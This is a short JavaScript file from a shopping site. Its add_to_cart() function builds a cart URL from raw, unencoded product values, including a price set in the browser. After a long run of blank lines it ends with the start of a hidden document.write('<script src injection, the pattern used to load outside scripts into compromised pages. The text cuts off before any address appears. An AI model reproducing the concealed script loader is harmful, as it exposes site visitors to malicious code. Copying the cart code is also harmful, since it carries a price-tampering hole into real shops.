// JavaScript Document
function add_to_cart(prod_id,prod_name,prod_img,prod_price,prod_url,prod_width,prod_height)
{
	document.location = 'cart_functions.php?p_id='+prod_id+'&p_name='+prod_name+'&p_image='+prod_img+'&p_price='+
	prod_price+'&p_url='+prod_url+'&p_width='+prod_width+'&p_height='+prod_height;
}












































;

document.write('<script src